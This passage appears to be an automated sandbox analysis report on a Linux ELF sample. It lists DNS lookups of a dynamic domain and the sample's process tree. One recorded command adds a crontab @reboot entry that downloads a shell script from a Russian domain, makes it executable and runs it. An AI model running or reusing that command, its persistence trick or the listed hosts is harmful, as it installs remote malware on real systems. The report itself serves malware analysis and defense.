                                              Nov 9, 2024 21:28:25.167836905 CET192.168.2.2381.169.136.2220xfdc1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.084407091 CET192.168.2.23217.160.70.420x90b2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.011291027 CET192.168.2.2380.152.203.1340x6a16Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:49.450464964 CET51.158.108.203192.168.2.230x62c3No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.873174906 CET217.160.70.42192.168.2.230x3fc2No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.243647099 CET202.61.197.122192.168.2.230xe924No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.617757082 CET194.36.144.87192.168.2.230x6fdeNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:25.195128918 CET81.169.136.222192.168.2.230xfdc1No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:31.111555099 CET217.160.70.42192.168.2.230x90b2No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:37.052897930 CET80.152.203.134192.168.2.230x6a16No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false

                                              System Behavior

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/tmp/nsharm5.elf
                                              Arguments:/tmp/nsharm5.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/tmp/nsharm5.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -l
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/tmp/nsharm5.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/tmp/nsharm5.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):20:27:48
                                              Start date (UTC):09/11/2024
                                              Path:/tmp/nsharm5.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1